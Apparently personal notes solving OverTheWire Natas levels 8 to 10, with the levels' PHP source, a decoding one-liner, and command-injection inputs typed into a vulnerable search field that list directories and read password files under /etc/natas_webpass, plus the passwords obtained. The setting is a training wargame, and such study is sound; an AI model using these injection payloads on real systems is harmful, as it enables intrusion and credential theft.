                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas8</h1>
                    <div id="content">

                    <?

                    $encodedSecret = "3d3d516343746d4d6d6c315669563362";

                    function encodeSecret($secret) {
                        return bin2hex(strrev(base64_encode($secret)));
                    }

                    if(array_key_exists("submit", $_POST)) {
                        if(encodeSecret($_POST['secret']) == $encodedSecret) {
                        print "Access granted. The password for natas9 is <censored>";
                        } else {
                        print "Wrong secret";
                        }
                    }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

                     oubWYf2kBq

                     Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl


                     L9:
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        passthru("grep -i $key dictionary.txt");
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                     http://natas9.natas.labs.overthewire.org/dictionary.txt

                     test; ls -la ../
                     Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../:
                    total 156
                    drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
                    drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
                    drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
                    drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
                    drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
                    drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
                    drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
                    drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
                    drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
                    drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
                    drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
                    drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
                    drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
                    drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
                    drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
                    drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
                    drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
                    drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
                    drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
                    drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
                    drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
                    drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
                    drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
                    drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
                    drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
                    drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
                    drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
                    drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
                    drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
                    drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
                    drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
                    drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
                    drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
                    drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
                    drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
                    drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
                    drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

                    test; ls -la ../../../../../-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../../../../../:
                    total 7965
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 .
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
                    -rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
                    lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
                    drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
                    drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
                    drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
                    drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
                    drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
                    drwxr-xr-x  11 root root    1024 Mar 18  2015 games
                    drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
                    drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
                    drwx------   2 root root   16384 Apr 20  2014 lost+found
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
                    drwxr-xr-x   3 root root    4096 Apr 20  2014 media
                    drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
                    dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
                    drwx------  11 root root    4096 Jul 10 14:12 root
                    drwxr-xr-x  18 root root     680 Jan  6 20:52 run
                    drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
                    dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
                    drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
                    drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
                    drwxr-xr-x  15 root root    4096 Nov 14  2014 var
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

                    test;cat ../../../../../README.txt
                    Output:
                                 
                          ,----..            ,----,          .---.
                         /   /   \         ,/   .`|         /. ./|
                        /   .     :      ,`   .'  :     .--'.  ' ;
                       .   /   ;.  \   ;    ;     /    /__./ \ : |
                      .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
                      ;   |  ; \ ; | |    :     | /___/ \ |    ' '
                      |   :  | ; | ' ;    |.';  ; ;   \  \;      :
                      .   |  ' ' ' : `----'  |  |  \   ;  `      |
                      '   ;  \; /  |     '   :  ;   .   \    .\  ;
                       \   \  ',  /      |   |  '    \   \   ' \ |
                        ;   :    /       '   :  |     :   '  |--"
                         \   \ .'        ;   |.'       \   \ ;  
                      www. `---` ver     '---' he       '---" ire.org  
                                 
                               
                    Welcome to the OverTheWire games machine!

                    If you find any problems, please report them to Steven on
                    irc.overthewire.org.

                    --[ Playing the games ]--

                      This machine holds several wargames.
                      If you are playing "somegame", then:

                        * USERNAMES are somegame0, somegame1, ...
                        * Most LEVELS are stored in /somegame/.
                        * PASSWORDS for each level are stored in /etc/somegame_pass/.

                      Write-access to homedirectories is disabled. It is advised to create a
                      working directory with a hard-to-guess name in /tmp/.  You can use the
                      command "mktemp -d" in order to generate a random and hard to guess
                      directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
                      so that users can not snoop on eachother.

                      Please play nice:
                       
                        * don't leave orphan processes running
                        * don't leave exploit-files laying around
                        * don't annoy other players
                        * don't post passwords or spoilers
                        * again, DONT POST SPOILERS!
                          This includes writeups of your solution on your blog or website!

                    --[ Tips ]--

                      This machine has a 64bit processor and many security-features enabled
                      by default, although ASLR has been switched off.  The following
                      compiler flags might be interesting:

                        -m32                    compile for 32bit
                        -fno-stack-protector    disable ProPolice
                        -Wl,-z,norelro          disable relro

                      In addition, the execstack tool can be used to flag the stack as
                      executable on ELF binaries.

                      Finally, network-access is limited for most levels by a local
                      firewall.

                    --[ Tools ]--

                     For your convenience we have installed a few usefull tools which you can find
                     in the following locations:

                        * peda (https://github.com/longld/peda.git) in /usr/local/peda/
                        * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
                        * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
                        * radare2 (http://www.radare.org/) should be in $PATH

                    --[ More information ]--

                      For more information regarding individual wargames, visit
                      http://www.overthewire.org/wargames/

                      For questions or comments, contact us through IRC on
                      irc.overthewire.org.

                     test;cat ../../../../../etc/natas_webpass/natas10
                     nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

                     test;cat ../../../../../etc/lsb-release
                     DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=14.04
                    DISTRIB_CODENAME=trusty
                    DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

                    L10:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas10</h1>
                    <div id="content">

                    For security reasons, we now filter on certain characters<br/><br/>
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        if(preg_match('/[;|&]/',$key)) {
                            print "Input contains an illegal character!";
                        } else {
                            passthru("grep -i $key dictionary.txt");
                        }
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    . /etc/natas_webpass/natas11
                    U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

                    Regards,
                    Yuriy Stanchev/URIX